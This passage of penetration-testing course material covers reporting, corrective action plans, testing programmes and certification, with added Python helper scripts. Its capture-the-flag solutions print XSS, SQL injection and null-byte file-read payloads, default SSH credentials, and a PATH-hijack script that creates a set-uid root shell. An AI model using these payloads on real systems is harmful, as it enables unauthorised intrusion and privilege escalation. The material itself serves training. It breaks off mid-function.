
Summary for Day 4

Section 14: Documentation of the test, quality review and report


Section 15: Action plans and follow up
Section 16: Managing a testing programme
Section 17: Competence and evaluation of testers
Section 18: Capture the flag exercise
Section 19: Closing the training

© 2015 PECB, Parker Solutions Group, Sysca Consulting


Version 1.2.2
Graeme Parker and Pablo Sisca (Editors)

Documents provided to participants are strictly reserved for training purposes and are copyrighted by Parker
Solutions Group and Sysca Consulting. Unless otherwise specified, no part of this publication may, without the
written permission of Parker Solutions Group and Sysca Consulting, be reproduced or used in any way or format
or by any means, whether electronic or mechanical, including photocopy and microfilm.

Licensed to Synergy Innovation Group (contact@synergy-innov.com)


©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
Penetration Testers must produce and keep work documents to support the conclusions and results of the engagement.
Work documents shall:
1. Contain only facts: the tester shall document enough elements of proof to support the findings, in enough detail
for another tester to evaluate the evidence collected.
2. Be written in an intelligible way: notes shall be brief and precise, but their content must remain understandable
to another tester. Abbreviations and "point form" are acceptable as long as the form is standardized and the
terminology is generally known to other testers.
3. Identify the weak points: work documents shall enable the rapid identification of the weak points of the tested
system and detail how each was identified, so that it can be easily referenced when the report is developed.

The document example above is not a mandatory requirement or deliverable of a penetration test. Maintaining such a
log during the test will, however, make report writing easier, reduce the risk of details being overlooked and help
the tester justify the statements made in the report, since facts established at a known point in time can be
referenced.
The table above illustrates a good example of a work document that the lead penetration tester can easily build in
an Excel file.
An OWASP Application Check List Spreadsheet can be found in the Supporting Folder material to illustrate other
examples used in the industry.
Supporting Material of how to build this checklist can also be found here:
http://mdsec.net/wahh/tasks.html
http://danielmiessler.com/projects/webappsec_testing_resources/
https://www.owasp.org/index.php/Testing_Checklist
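
As an added example of the kind of work document discussed above (this is editor-supplied code, not part of the course material or its supporting folder): a small Python script that keeps a CSV evidence log, one row per observation, with a UTC timestamp, the SHA-256 of the raw evidence and a chain hash linking each row to the previous one, so that later edits or deletions are detectable when the log is used to justify a statement in the report. The column layout, the tester name and the sample entries are assumptions; the CSV opens directly in Excel.

```python
"""Evidence log for a penetration test: one CSV row per observation.

Each row records when, who, where, what was done and what was seen, the
SHA-256 of the raw evidence (screenshot, pcap, command output) and a chain
hash over the previous row's chain value plus this row's content, so that a
reviewer can detect edited or removed rows when the log backs a report claim.
Column layout and sample entries are assumptions made for this example.
"""
import csv
import hashlib
import io
from datetime import datetime, timezone

FIELDS = ["seq", "timestamp_utc", "tester", "target", "action",
          "observation", "evidence_sha256", "chain"]
GENESIS = "0" * 64  # chain value "before" the first row


def _chain_hash(prev_chain, row):
    """SHA-256 over the previous chain value and every column except 'chain'."""
    payload = prev_chain + "|" + "|".join(row[f] for f in FIELDS if f != "chain")
    return hashlib.sha256(payload.encode("utf-8")).hexdigest()


class EvidenceLog:
    def __init__(self, tester):
        self.tester = tester
        self.rows = []
        self._chain = GENESIS

    def add(self, target, action, observation, evidence, when=None):
        """Append one observation; `evidence` is the raw bytes being hashed.
        `when` must be a UTC datetime (defaults to now)."""
        when = when or datetime.now(timezone.utc)
        row = {
            "seq": str(len(self.rows) + 1),
            "timestamp_utc": when.strftime("%Y-%m-%dT%H:%M:%SZ"),
            "tester": self.tester,
            "target": target,
            "action": action,
            "observation": observation,
            "evidence_sha256": hashlib.sha256(evidence).hexdigest(),
        }
        row["chain"] = self._chain = _chain_hash(self._chain, row)
        self.rows.append(row)
        return row

    def to_csv(self):
        """Serialise the log as CSV text (Excel-compatible)."""
        buf = io.StringIO()
        writer = csv.DictWriter(buf, fieldnames=FIELDS, lineterminator="\n")
        writer.writeheader()
        writer.writerows(self.rows)
        return buf.getvalue()


def verify_csv(text):
    """Recompute the chain over a CSV log.

    Returns (True, 0) if every row links to its predecessor, otherwise
    (False, seq) where seq is the first row whose chain value does not match,
    i.e. that row or something before it was altered or removed.
    """
    prev = GENESIS
    for row in csv.DictReader(io.StringIO(text)):
        if row["chain"] != _chain_hash(prev, row):
            return False, int(row["seq"])
        prev = row["chain"]
    return True, 0


if __name__ == "__main__":
    log = EvidenceLog("tester-01")  # constructed entries, not a real engagement
    log.add("10.0.0.5", "nmap -sV -p22,80 10.0.0.5",
            "22/tcp open, OpenSSH 7.4 banner", b"<constructed nmap output>")
    log.add("10.0.0.5", "ssh admin@10.0.0.5 (password from wordlist)",
            "login accepted with a default password", b"<constructed session log>")
    text = log.to_csv()
    print(text)
    print("intact:", verify_csv(text))
    tampered = text.replace("login accepted", "login refused")
    print("after editing row 2:", verify_csv(tampered))
```

The raw evidence itself is stored separately (and under the same protection as the records discussed below); the log only carries its hash, so a reviewer can confirm that the file attached to a finding is the one observed at the recorded time.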

The testing records are the entire documentation generated from the information collected during the testing
activities. Drafts, copies, previous versions and other documents not related to the testing activities are not
generally kept as records.
The test records are kept at least until the completion of the testing, and then archived.
Subsequently, any other security-related documents still in the tester's possession (e.g. those provided for a
white box test) are destroyed, returned to the client or archived, according to the dispositions agreed when the
testing agreement was signed.
Members of the penetration testing team are responsible for ensuring an adequate level of protection of the
client's confidential information contained in the testing records.
Unless otherwise stated, the test records are the property of the organization conducting the tests; the other
documents are the property of the client.

Work documents are the primary evidence produced during a penetration test. The peer quality review ensures that
all team members have complied with the test procedures. The review should be performed by an experienced Lead
Penetration Tester.
The verification of work documents is necessary to ensure that:
1.The test procedures used were appropriate and reliable.
2.The test procedures were used correctly.
3.The testers collected sufficient information to support their conclusions.
4.The test findings and conclusions are logical and objective.

The assessment report must be written in the language agreed between the client and the organization conducting
the tests. The wording of the report must be understandable at first reading by people who did not participate in
the test, so all the elements necessary to understand the findings and test conclusions should be reported. It is
therefore essential for the tester to provide accurate and factual descriptions of the circumstances (e.g.
locations, quantities, etc.).
However, there is no point in producing a 200-page assessment report that will never be read.
Asking the right questions before reporting also avoids a report that is too technical or boring, or one in which the
reader is lost in details irrelevant to the objectives of the test. Before writing the report, the tester may ask
the following questions:
-Who are the primary readers of the report?
-How well do they know the subject?
-From what perspective do they intend to use the report?
-At what level of detail are they interested in the report?
-What would be their reaction on reading the message conveyed by the report?
It may be necessary to create a business-friendly summary report for executive management and a longer technical
report for the IT team. The main aim of any report, however, is to ensure that the organization and its members
understand the problems well enough to be able to implement corrective solutions.

Similarly, to ensure the overall quality of the document, the tester considers different levels of proofreading to
structure the report appropriately, so that the message reaches the client with all the required clarity and
accuracy. Usually three proofreading levels are identified for a test report: the report as a whole, the paragraphs,
and the sentences (including the tables).
General level of the report:
•Is the central message of the report understandable to the reader?
•Is the length of the report appropriate?
•Is there an executive summary at the beginning of the report?
•Is the division into chapters sufficient, and are the titles clear?
•Does the report contain suitable graphics (e.g. images, charts, diagrams)?
Paragraph level:
•Does the paragraph contain a central sentence that states the main idea to be presented?
•Does the paragraph contain enough information to support the idea in that central sentence?
•Does the paragraph contain too much information, burdening the reading and preventing a correct understanding?
•Do the ideas presented in the paragraph follow a logical sequence?
Sentence level:
•Are the sentences easy to understand?
•Are they short enough (not too complex)?
•Do they contain too much technical vocabulary, or words difficult to understand outside the context of the test?
•Do they contain action verbs and actors (an active structure is usually preferable to a passive one)?

For a complete overview of CVSS see: http://www.first.org/cvss/cvss-guide

The above scoring systems are very useful, but one disadvantage compared with CVSS is that they do not consider
impacts specific to an organization: the impact is assumed to be the same for all organizations. (CVSS handles this
through its environmental metric group.)
Details of these schemes can be found at:
http://www.kb.cert.org/vuls/html/fieldhelp
http://www.sans.org/newsletters/risk/
http://technet.microsoft.com/en-US/security/gg309177.aspx
Important Note. We have described vulnerability scoring systems. These differ from vulnerability databases and
naming schemes, which give common names to vulnerabilities. These databases provide rich information and try to
assign common names for shared understanding, but naming schemes such as CVE do not themselves present scores
(NVD, which is built on CVE, does attach CVSS base scores to its entries). They are nevertheless useful for
gathering and presenting technical knowledge and detail and for establishing consistent definitions. For more
information see:
Common Vulnerabilities and Exposures: http://cve.mitre.org/about/index.html
National Vulnerability Database: http://nvd.nist.gov/
Open Source Vulnerability Database: http://osvdb.com/ (the OSVDB project closed in 2016; the link is kept as it
appeared in the course)
Bugtraq: http://www.securityfocus.com/archive/1

•The test report shall be published within an agreed time period.
•The test report must be dated, verified and approved in accordance with the procedures of the test programme.
•The approved test report must be distributed to a list of recipients designated in advance by the test client.
•The client and all recipients on the list must respect and maintain the confidentiality of the report.
Important Note!! A penetration testing report contains details of organizational and technical vulnerabilities. In
the wrong hands the report is almost a guide to compromising the organization. Penetration testers therefore have a
professional duty to ensure that the report is a) distributed only to the individuals agreed in advance and b)
distributed in a secure manner. The distribution technique should be agreed in advance with the client: an
encrypted or secure mail service, physical secure delivery, or some other mechanism. Under no circumstances should
a penetration testing report be sent in clear text from an external email address or by ordinary post/courier. Once
the report is in the hands of the organization it becomes their responsibility to handle it securely, and the
penetration tester should stress the importance and sensitivity of the report.

If, following the analysis, management decides to accept the risk instead of implementing corrective, preventive or
improvement actions, this decision must be documented as required by the organization's risk management process
and risk acceptance criteria.
Such plans can be submitted to the Penetration Tester for review, so that suitable advice and guidance can be given
to the client.

A tester or consultant must always remember that it is very unlikely that an organization will accomplish all the
improvements simultaneously. Each improvement requires resources and time for implementation. Action plans can be
prioritized by management, especially where investments are required.

You have received a plan for corrective actions. Evaluate the adequacy of the proposed corrective actions. If you
agree with the corrective actions, explain why. If you disagree, explain why and propose what you think would be
adequate corrective actions.
1.A finding was raised because a Microsoft Windows server had over 12 months of patches missing.
Proposed action plan: Organise a formal change to apply all relevant patches and test accordingly.
2. A finding has been raised because the tester could boot an internal PC into LINUX using a CD and then
override local security settings. They could also steal the Windows SAM file and crack passwords offline.
Proposed action plan: Disable the ability to boot from the CD-ROM on the PC.
3. A finding has been raised because the tester could access resources on the local CITRIX server by using the
command line. The CITRIX server was meant to host a specific application and a standard user should not have
access to the command line. Through this the tester (with a standard user logon account) managed to access a
number of local files on the server which contained highly sensitive information.

4. A finding was raised because the penetration tester was able to obtain a number of passwords through social
engineering. The tester made telephone calls to a number of users profiled through social networking sites, in the
calls he posed as a member of IT support stating the passwords were required for emergency support work.
Proposed action plan: Send an email to all staff reminding them never to reveal passwords to anyone including IT
support.
5. Several findings were raised because the penetration tester was able to gain unauthorised access to a key
office. Once in the building they were able to freely sit at a desk, connect their machine and conduct a number of
activities such as sniffing local network traffic. During this sniffing exercise they captured credentials to a number
of key systems. When accessing the building they reported to the main reception and claimed to be an IT support
engineer. They were immediately sent to the relevant floor of the office. They were then allowed through the main
door of the office by tailgating a member of staff who had a key fob access card.
Proposed action plan: Several actions have been proposed by the client:
•Implement a procedure where all visitors to the main reception are reported to a relevant contact in the office.
The office contact will be required to collect the visitor from reception, hand them a visitor's badge, check
their ID and escort them at all times.
•Send an email to all staff reminding them of the risks of tailgating.
•Implement MAC address filtering to prevent unauthorized machines from connecting to the network.

Although the information in this section applies to internal penetration testing, the elements of an effective
test programme are essentially the same for tests conducted by third parties; the tools, procedures and techniques
are essentially the same.

In organizations employing a full-time team of internal testers, it is desirable to implement a continual internal
test programme. The conditions for implementing such a programme are:
•High level of automation;
•Respect for important guidelines;
•Automated process producing information rapidly related to the topic;
•Alarms for the triggering of a failure;
•Automated test tools;
•Automated reporting;
•Competent testers;
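
As an added example of the automation and alarming the bullets above describe (editor-supplied code, not from the course material): a Python script that compares two runs of a recurring nmap scan, read from nmap's grepable (-oG) output, and raises an alarm for every newly reachable host, newly open port or changed service banner. The two scan outputs are constructed sample data and the alarm categories are assumptions; in a real programme the script would run after each scheduled scan and feed a ticketing or alerting system.

```python
"""Baseline comparison for a recurring scan: alarm on anything newly exposed.

Reads nmap "grepable" (-oG) output, which has one line per host of the form
  Host: 10.0.0.5 (web01)<TAB>Ports: 22/open/tcp//ssh//OpenSSH 7.4/, ...<TAB>Ignored State: closed (998)
where each port entry is port/state/protocol/owner/service/rpcinfo/version/.
Both scans below are constructed sample data, not output from a real network.
"""
import re

HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)\s+Ports:\s+(.*?)(?:\t|$)")

BASELINE = """# Nmap scan (constructed baseline from the previous run)
Host: 10.0.0.5 (web01)\tStatus: Up
Host: 10.0.0.5 (web01)\tPorts: 22/open/tcp//ssh//OpenSSH 7.4/, 80/open/tcp//http//nginx 1.14.0/\tIgnored State: closed (998)
Host: 10.0.0.9 (db01)\tPorts: 22/open/tcp//ssh//OpenSSH 7.4/, 3306/filtered/tcp//mysql///\tIgnored State: closed (998)
"""

CURRENT = """# Nmap scan (constructed output of today's run)
Host: 10.0.0.5 (web01)\tPorts: 22/open/tcp//ssh//OpenSSH 7.4/, 80/open/tcp//http//nginx 1.18.0/, 8080/open/tcp//http-proxy//Jetty 9.4/\tIgnored State: closed (997)
Host: 10.0.0.9 (db01)\tPorts: 22/open/tcp//ssh//OpenSSH 7.4/, 3306/open/tcp//mysql//MySQL 5.7.31/\tIgnored State: closed (998)
Host: 10.0.0.23 (jump01)\tPorts: 3389/open/tcp//ms-wbt-server//Microsoft Terminal Services/\tIgnored State: closed (999)
"""


def parse_grepable(text):
    """Return {ip: {(port, proto): (service, version)}} for open ports only."""
    hosts = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # "# Nmap ..." comments and "Status: Up" lines carry no ports
        ip, ports_field = m.group(1), m.group(3)
        open_ports = {}
        for entry in ports_field.split(", "):
            f = entry.split("/")
            if len(f) < 7 or f[1] != "open":
                continue  # closed/filtered ports are not exposure
            open_ports[(int(f[0]), f[2])] = (f[4], f[6])
        hosts[ip] = open_ports
    return hosts


def diff_scans(baseline, current):
    """List alarms as tuples whose first element is the alarm type."""
    alarms = []
    for ip, ports in current.items():
        if ip not in baseline:
            alarms.append(("NEW_HOST", ip, sorted(ports)))
            continue
        for key, svc in ports.items():
            if key not in baseline[ip]:
                alarms.append(("NEW_PORT", ip, key, svc))
            elif baseline[ip][key] != svc:
                alarms.append(("CHANGED", ip, key, baseline[ip][key], svc))
    for ip in baseline:
        if ip not in current:
            alarms.append(("HOST_GONE", ip))  # a scan gap as much as a change: worth a look
    return alarms


def run(baseline_text=BASELINE, current_text=CURRENT):
    return diff_scans(parse_grepable(baseline_text), parse_grepable(current_text))


if __name__ == "__main__":
    for alarm in run():
        print(*alarm)
```

Only open ports are compared, so a port going from filtered to open (3306 on db01 above) shows as new exposure, while a host that disappears is reported separately because it may mean the scan, not the host, failed. Nmap writes "|" instead of "/" inside version strings in grepable output, which is why splitting on "/" is safe.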

An organization that implements a test programme (internally or externally) must make sure to provide the
necessary resources for its operation, including:
1. Financial resources necessary to develop, implement, manage and improve the test activities.
2. Competent personnel (testers and technical experts) to conduct the tests.
3. Tools (computers, software, etc.).
4. Test policies and procedures.
5. Logistics (transportation, accommodations and other needs related to the test).

The effectiveness and efficiency of a penetration testing programme depend on the performance of each tester, each
team and the test department.
The goal of the test performance verification is to determine whether the test programme meets the expectations of
the organization and was conducted according to industry practices. It can be performed using a formal evaluation
method, by independent review or by the analysis of performance indicators.
The goal of verifying the testers' work is to evaluate the performance and competencies of the testers. This can be
done through the review and analysis of annual evaluations.
The goal of interpreting the improvement contributions is to evaluate the improvement achieved by the test
programme and its contribution to the test firm's performance.

The confidence and reliability granted to the penetration testing process depends on the competence of the
personnel who conduct the test. This competence is based on the demonstration of each tester’s personal
qualities and their ability to apply the test principles. The competences of testers are based on a rigorous learning
process and the maintenance of competences: initial training, continual training and professional experience.
Some knowledge and skills are common to testers of all management systems, whereas others are specific to
testers in each discipline.

ISO 19011, clause 3.17: Competence
Ability to apply knowledge and skills to achieve intended results.
Note: Ability implies the appropriate application of personal behavior during the test process.
The three dimensions of competence are:
1.Knowledge: knowledge is the acquaintance with facts, truths, or principles, as from study or investigation that
is held by the individual. It is the mastery of the concepts and theoretical knowledge.
2.Skill: Skills are usually related to practical competences and expertise of the individual.
3.Attitude: Attitude is tied to the ability to adapt to different situations and to adjust your behavior according to
the characteristics of the environment, the situation and the others.
Note on terminology:
•“Theoretical competence” and “Cognitive competence” are synonyms for knowledge.
•"Practical competence” and “Functional competence” are synonyms for skill.
•"Behavioral Competence” and “Social competences” are synonyms for attitude.

Penetration Testers should possess the qualities necessary to act in accordance with the ethical and professional
principles discussed in this course. These qualities include:
•ethical, i.e. fair, truthful, sincere, honest and discreet;
•open-minded, i.e. willing to consider alternative ideas or points of view;
•diplomatic, i.e. tactful in dealing with people;
•observant, i.e. actively observing physical surroundings and activities;
•perceptive, i.e. aware of and able to understand situations;
•versatile, i.e. able to readily adapt to different situations;
•tenacious, i.e. persistent, focused on achieving objectives;
•decisive, i.e. able to reach timely conclusions based on logical reasoning and analysis;
•self-reliant, i.e. able to act and function independently whilst interacting effectively with others;
•acting with fortitude, i.e able to act responsibly and ethically even though these actions may not always be
popular and may sometimes result in disagreement or confrontation;
•open to improvement, i.e. willing to learn from situations, striving for better test results;
•culturally sensitive, i.e. observant and respectful to the culture of the client;
•collaborative, i.e. effectively interacting with others, including test team members and the client's personnel.

Penetration Testers should possess knowledge and aptitudes in the following fields.
1. Test concepts: test principles, procedures and techniques:
•Understand and explain the key purpose and business benefits of penetration testing.
•Ability to identify, analyze and evaluate the compliance requirements of an organization that could be supported
through penetration testing.
•Ability to explain and illustrate the main concepts of penetration testing and their relationship with Information
Security Risk Management.
•Understanding of the different types of penetration test, including black box, white box, grey box, announced,
unannounced, internal, external, manual and automated, and when to use each approach.
•Understanding of the phases of a penetration test.
•Understanding of the relevant legal, regulatory, contractual and ethical issues related to Penetration Testing.
•Understanding of the success factors for Penetration Testing exercises.
2. Technical Knowledge:
•Ability to understand network protocols based on TCP/IP and their basic operation.
•Ability to understand the operation of DNS
•Ability to conduct port scans to identify operating services
•Ability to understand the Microsoft Windows Architecture and the ways in which Windows can be exploited
•Ability to understand the LINUX Architecture and the ways in which LINUX can be exploited
•Ability to understand network infrastructure vulnerabilities and how network devices can be exploited
•Ability to understand wireless vulnerabilities and how wireless networks can be exploited
•Ability to understand web application vulnerabilities and how applications can be exploited
•Ability to understand mobile device vulnerabilities and how such devices can be exploited
•Ability to understand the fundamentals of Trojans and Backdoors
•Ability to conduct basic packet sniffing and network traffic analysis

3. Laws, regulations and other applicable requirements relevant to a test:
•Know the main codes, laws, regulations applicable to the test (at the local, regional, national or international
levels).
•Be able to read and understand commercial contracts and agreements between organizations.
•Know the routine operation of the management and application of the internal policies of the organization.
4. Organizational processes:
•Understand the routine operation of an organization (structure, functions, hierarchy, etc.).
•Understand the main processes (human resources, accounting, production, public relations, sales, etc.) present
in an organization as well as the associated terminology.
•Understand the cultural and social context of an organization as well as the human dynamics connected to
them.
5. Risk management:
•Understand and evaluate the risks related to technical, physical and organisational vulnerabilities.
•Understand, evaluate and manage test risks.

The main Penetration Tester credentials:
1. The credential "Certified Provisional Pen Test Professional" recognizes that the person has basic knowledge of
testing and can be a member of a Penetration Testing Team.
2. The credential "Certified Pen Test Professional" recognizes that the person has the knowledge necessary to
participate in a penetration test and the basic skills to conduct elements of a Penetration Test.
3. The credential "Certified Lead Pen Test Professional" recognizes that the person masters the knowledge of
Penetration Testing, demonstrates the competencies of a professional penetration tester and has the abilities to
manage a team of Testers.

Passing the exam is not the only prerequisite for obtaining the professional certification "Certified Lead
Penetration Tester". This professional certification endorses both the passing of the exam and the validation of
the professional experience records. Unfortunately, many people claim to be Lead Penetration Testers after a
successful exam, although they do not have the required experience level.
Important note: Certification fees are included in the examination price. The candidate will therefore not have to
pay any additional costs when applying for certification at their corresponding experience level and receiving one
of the professional credentials: Certified Lead Penetration Tester, Certified Penetration Tester or Certified
Provisional Penetration Tester.

The objective of the certification examination is to ensure that Certified Lead Penetration Tester candidates have
mastered test concepts and techniques so that they are able to participate in test assignments. The PECB
examination committee shall ensure that the development and adequacy of the exam questions is maintained
based upon current professional practice. The questions were developed by a group of security specialists that
are all Certified Lead Pen Test Professional certified.
The exam only contains essay questions. The duration of the exam is 3 hours. The minimum passing
score is 70%.
All notes and reference documents may be used during the exam excluding the use of a computer.
The exam is available in several languages. When taking the exam, please ask the trainer or check the
“examination” section on the PECB website to know the list of available languages.
All seven competency domains are covered by the examination. To read a detailed description of each
competency domain, please visit the PECB website.

At the end of this training you will receive a document that certifies your course attendance and 31 Continuing
Professional Development (CPD) credits. This certificate attests only that the participant has attended the training
and not his success at the certification exam.

Each exam is marked by qualified correctors who are assigned anonymously. To ensure independence,
impartiality and the absence of conflicts of interest, trainers and supervisors take no part in the marking of
exams or in the certification of candidates.
Candidates are notified of their results by email within 4 to 8 weeks of the exam. The only possible outcomes are
PASS or FAIL; no numerical score or detailed correction key is sent to the candidate.
Important Note: Upon passing the exam you will receive an examination number by email, together with
instructions on how to apply to become a PECB Certified Pen Test Professional. The credential certificate is
issued only at the end of the certification process.
A candidate who fails the examination receives an explanation of the areas in which they did not demonstrate
the required competence. The candidate has twelve (12) months to sit a re-examination; to arrange it, the
candidate must contact the head of the training organization. The re-examination itself is free, although exam
supervision costs may apply.

After passing the exam, the candidate has a maximum of three years to submit a professional file in order to
obtain a professional credential under the ISO 27001 certification scheme. A candidate may apply at the same
time for more than one professional credential under that scheme (e.g. Lead Implementer and Master) if all
requirements are met.
With your application you must provide the following information:
1. Your contact details
•Make sure to write your name correctly (in ASCII characters) as you wish it to appear on your certificate.
2. Your professional experience and test experience
•You must provide a resume presenting your experience. Work experience can be any activity showing that you
have skills and a general knowledge of how an organization functions.
•For testing experience, be sure to indicate the number of hours completed.
•No equivalence is granted for work or testing experience: education degrees do not replace real-world
experience.
3. At least three references
•References must be people you know personally: colleagues, partners, supervisors, employees under your
direction, etc. What matters is that they know you well enough to attest to your qualifications.
•Since your application will not be assessed until at least two references have responded, it is preferable to
provide the maximum of five.

If you have any concerns or questions regarding your professional experience and its eligibility please contact
certification@pecb.org for further assistance.

References will be contacted to complete a short questionnaire attesting to your experience and evaluating your
personal qualities (according to the 13 professional behavioural skills defined in ISO 19011). A random sample
of references will be contacted by phone.
You can check whether your references have responded in your PECB member account. If your respondents are
late, follow up with them to ensure they have received the reference request.
If PECB is unable to contact one of your references, or a questionnaire is not answered, you will be asked to
provide further references.

Once certified, the candidate receives the PECB certificate electronically; it is valid for three years. After this
period it is renewed if the applicant meets the conditions for maintaining the professional designation.

Section summary:
1.The confidence and reliability granted to the test process depend on the competence of the personnel who
conduct the test.
2.The competence of testers rests on each tester demonstrating the personal qualities and the ability to apply
the test principles. It is built through a rigorous learning process and maintained over time: initial training,
continuous training and professional experience.
3.Certain knowledge and aptitudes are common to testers of all management systems, whereas others are
specific to testers of each discipline.
4.The certification body must have processes that guarantee its personnel have the knowledge necessary to
carry out their mission.
5.Testers should possess personal qualities that allow them to act in accordance with the test principles.
6.Testers should possess knowledge and aptitudes in the following fields: test principles, procedures and
techniques; management systems; organizational processes; legal aspects (laws, regulations and other
applicable requirements relevant to tests); and risk management.
7.A candidate for test certification (except for provisional status) must prove their qualifications (education,
training and work experience) for the requested professional designation.
8.Testers should maintain a log of their tests so that they can substantiate their professional experience.

Working in pairs – This activity can also be used as a mock exam. It should take roughly 1 hour.
Videos with the solution and exploitation are also provided.
Please allow 15 minutes after showing the videos for the students to reproduce these exploitable scenarios.
•Webapp-LocalFileAccess.avi
•Webapp-ReflectedXSS.avi
•Webapp-SQLiLogin.avi
•Webapp-StoredXSS.avi
Solutions
1. Reflected XSS on the homepage - the search box is vulnerable and accepts a standard XSS vector, e.g.:
<script>alert()</script>
2. Stored XSS - the comment parameter of the guestbook is vulnerable to stored XSS. Standard vector, e.g.:
<script>alert()</script>
3. SQL injection - the username parameter of the login page is vulnerable, e.g.: ' OR 1=1#
(the trailing # is MySQL's line comment: it discards the rest of the query, including the password check)
4. Local File Access - the page parameter of the admin URL is vulnerable and can be exploited with:
/admin/index.php?page=/etc/passwd%00
(the trailing %00 null byte truncates any suffix the application appends to the file name; this works only on
PHP versions before 5.3.4, which stopped accepting paths containing a null byte)
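The following script is an added example (not part of the course lab) that reproduces the four solutions offline: it models the search page with and without output escaping, runs the login query both as string-concatenated SQL and with bound parameters against an in-memory SQLite table, and builds and verifies the local file access request. The lab application, its table layout and the `admin`/`s3cret` account are constructed stand-ins; SQLite is used in place of the lab's MySQL, so the injection uses the `--` comment rather than `#`.

```python
"""Offline checks for the four web CTF vectors above (added example, not the
course lab's code).  Constructed stand-ins replace the lab application so the
script runs without a network."""
import html
import re
import sqlite3

XSS_PAYLOAD = "<script>alert()</script>"


def render_search(term: str, escape: bool) -> str:
    """Constructed stand-in for the search page: the vulnerable variant
    interpolates the term raw, the fixed variant HTML-escapes it."""
    shown = html.escape(term) if escape else term
    return "<h1>Results for %s</h1>" % shown


def reflected_unescaped(payload: str, body: str) -> bool:
    """True when the raw payload comes back in the response body; a page that
    escapes its output contains html.escape(payload) instead."""
    return payload in body


def make_db() -> sqlite3.Connection:
    """In-memory users table standing in for the lab's login database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    return conn


def vulnerable_login(conn, username: str, password: str) -> bool:
    # String formatting: the username parameter becomes part of the SQL text.
    sql = ("SELECT 1 FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return conn.execute(sql).fetchone() is not None


def safe_login(conn, username: str, password: str) -> bool:
    # Bound parameters: the same input is treated as data, never as SQL.
    sql = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


# SQLite only knows the "--" line comment; MySQL, which the lab runs, also
# accepts "#", hence the slide's "' OR 1=1#".  Either one comments out the
# password check that follows the injected quote.
SQLI_PAYLOAD = "' OR 1=1-- "

ROOT_ENTRY = re.compile(r"^root:[^:]*:0:0:", re.M)


def lfi_hit(body: str) -> bool:
    """Proof that /etc/passwd was read: the root entry appears in the body."""
    return ROOT_ENTRY.search(body) is not None


def lfi_url(base: str, path: str, null_byte: bool = True) -> str:
    """Build the admin page URL.  PHP before 5.3.4 truncated include paths at
    a NUL byte, so the %00 strips any suffix the application appends."""
    return "%s/admin/index.php?page=%s%s" % (base, path, "%00" if null_byte else "")


if __name__ == "__main__":
    print("XSS reflected raw:", reflected_unescaped(XSS_PAYLOAD, render_search(XSS_PAYLOAD, False)))
    print("XSS reflected escaped:", reflected_unescaped(XSS_PAYLOAD, render_search(XSS_PAYLOAD, True)))
    db = make_db()
    print("vulnerable login bypassed:", vulnerable_login(db, SQLI_PAYLOAD, "wrong"))
    print("safe login bypassed:", safe_login(db, SQLI_PAYLOAD, "wrong"))
    print("LFI URL:", lfi_url("http://target", "/admin/../../etc/passwd".split("/admin/..")[1]))
```

The point of pairing `vulnerable_login` with `safe_login` is that the same payload is sent to both: only the concatenated query is bypassed, which is the evidence to put in the report next to the fix. `lfi_hit` is the check to run on the response body before claiming a file read; a page that merely echoes the parameter also contains "/etc/passwd" but not the root entry.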

Working in pairs – This activity can also be used as a mock exam. It should take 1 hour.
This “Capture the Flag” activity has two videos to show the students if, after 30 minutes, they have not found a
way to exploit the system.
Please allow 15 minutes after showing the videos for the students to reproduce these exploitable scenarios.
* Linux-SUID-Path.avi
* Linux-Shellshock.avi
A) Simple brute-force scenario to see whether the students can use pen testing tools:
SSH is open - msfadmin has the password 'password'
B) SETUID exploit:
Find set-uid or set-gid files (the -o must be parenthesised; otherwise -type f applies only to the second test and
set-gid directories are listed as well):
    find / -type f \( -perm -u=s -o -perm -g=s \) 2>/dev/null
Look at the binary to see if you can figure out what it does:
    strings ./binary
    strace -qf -e trace=execve ./binary      (shows which other programs it calls)
Look at the permissions of the other programs it calls.
If system binaries are called by bare name (e.g. "ls" rather than "/bin/ls"), look at how they are called and
whether you can change the PATH variable so that a program of your own is found first.
Change PATH to "." (export PATH=.) and drop a custom executable "ls" file into the current directory, containing
the following:

    #!/bin/sh
    /bin/cp /bin/sh /tmp/sh
    /bin/chown root /tmp/sh
    /bin/chmod 6555 /tmp/sh
Make it executable (chmod +x ./ls) and run the set-uid binary: it runs your "ls" as root and leaves a set-uid root
copy of sh in /tmp.
Note on the resulting shell: bash drops its effective root privileges when the effective uid differs from the real uid
unless it is started with -p, so if /bin/sh is bash run /tmp/sh -p. dash (the default /bin/sh on Debian and Ubuntu)
does not drop privileges, which is why the copy can simply be named 'sh' and run as-is.
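An added example (not the course's tooling) that automates the enumeration steps above: it walks the filesystem for set-uid/set-gid regular files, then extracts the printable strings of each, the way strings(1) does, and reports bare command names that would be resolved through PATH at run time. The list of tool names it looks for and the constructed sample binary are assumptions for illustration; nothing here talks to the lab host.

```python
"""Added example (not the course's tooling): list set-uid/set-gid files and
flag bare command names inside them.  A bare name such as "ls" is resolved
through PATH at run time, which is the weakness the fake "ls" above abuses."""
import os
import re
import stat

# Utilities a set-uid program commonly runs via system()/popen() by bare name
# (assumed list; extend it for the target's own helper programs).
COMMON_TOOLS = {"ls", "cp", "cat", "mv", "rm", "ps", "id", "sh", "bash", "echo",
                "grep", "mail", "date", "chmod", "chown", "find", "tail"}
PRINTABLE = re.compile(rb"[\x20-\x7e]{2,}")   # runs strings(1) would print


def is_suid_mode(mode: int) -> bool:
    """Regular file carrying the set-uid or set-gid bit (find -perm -4000/-2000)."""
    return stat.S_ISREG(mode) and bool(mode & (stat.S_ISUID | stat.S_ISGID))


def find_suid_binaries(root: str = "/") -> list:
    """Walk root without following symlinks and return set-uid/set-gid files."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:          # vanished file, unreadable mount, ...
                continue
            if is_suid_mode(st.st_mode):
                hits.append(path)
    return sorted(hits)


def relative_commands_in(data: bytes) -> list:
    """Bare tool names among the printable strings of a binary image.  Only
    the first word of each string is considered, so "ls -la /tmp" is flagged
    as "ls" while "/bin/cp" (absolute, not PATH-dependent) is not."""
    found = set()
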